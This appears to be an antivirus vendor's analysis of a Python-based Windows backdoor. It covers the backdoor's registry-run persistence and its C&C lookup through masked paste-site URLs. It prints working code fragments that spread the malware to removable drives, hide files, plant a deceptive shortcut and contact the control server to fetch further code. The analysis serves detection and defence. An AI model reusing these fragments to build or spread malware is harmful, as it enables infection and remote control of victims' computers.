SHA1:
- 05cae95a3340395e363c2d6bddbc57833dbdb85c
A backdoor for Windows written in Python. Contains a packed tool py2exe.
Installation
- If a file name does not match “mscore.exe”, it creates its copy in a folder All Users\Application Data\NetFramework\ with the name mscore.exe.
- Registers itself in the autorun: if administrator privileges are available—in the registry branch [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run], else—in the branch [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run].
- Shuts down the script and wait for a reboot.
Distribution
- Tries to infect removable media with names from C to Z:
for letter in 'CDEFGHIJKLMNOPQRSTUVWXYZ': drive = u'{}:\\'.format(letter) if bitmask & 1 and ctypes.windll.kernel32.GetDriveTypeW(drive) == 2: mounted_letters = subprocess.Popen('wmic logicaldisk where deviceid="%s:" get Size' % letter, startupinfo = startupinfo, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, stdin = subprocess.PIPE) length = mounted_letters.stdout.readlines()[1].strip() if not length.isdigit(): continue volume_name_buffer = ctypes.create_unicode_buffer(1024) ctypes.windll.kernel32.GetVolumeInformationW(drive, volume_name_buffer, ctypes.sizeof(volume_name_buffer), None, None, None, None, None) - Creates a hidden directory:
hidden_folder = os.path.join(drive, unichr(160)) if not os.path.exists(hidden_folder): os.mkdir(hidden_folder) ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2) - Saves its copy with the name VolumeInformation.exe:
destination_file_path = os.path.join(drive, 'VolumeInformation.exe') if not os.path.exists(destination_file_path): shutil.copyfile(sys.argv[0], destination_file_path) ctypes.windll.kernel32.SetFileAttributesW(destination_file_path, 2) - In the root disc directory, it creates a link that looks the following way: <volume name>.lnk (or Removable Disk.lnk). The link refers to the malicious executable file VolumeInformation.exe:
ctypes.windll.kernel32.GetVolumeInformationW(drive, volume_name_buffer, ctypes.sizeof(volume_name_buffer), None, None, None, None, None) if len(volume_name_buffer.value) == 0: lnk_name = 'Removable Disk' else: lnk_name = volume_name_buffer.value - Moves files different from .lnk, VolumeInformation.exe and .vbs to the preliminary created hidden folder:
for content in os.listdir(drive): if not content.endswith('.lnk') and not content.endswith('.vbs') and 'VolumeInformation' not in content: try: shutil.move(os.path.join(drive, content), hidden_folder) except: continue
Communication with the C&C server
The Trojan attempts to define an IP address and an available port of the command and control server by sending a request to several Internet servers:
url_list = [
'http://pastebin.com/raw/xf****iX',
'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs'
'http://notes.io/r***H'
]
If it is successful in obtaining an IP address and a port, it sends a request to the C&C server. The request looks the following way:
GLOBAL_SOCKET.sendall(str({
'mode': 'buildClient',
'from': 'client',
'payload': '{}'.format(MODERATOR), # MODERATOR = "UPX"
'key': '',
'module_id': '',
'session_id': '' }) + '[ENDOFMESSAGE]'
)
As a response from the C&C server, a script written in Python is downloaded. It is detected as Python.BackDoor.35.
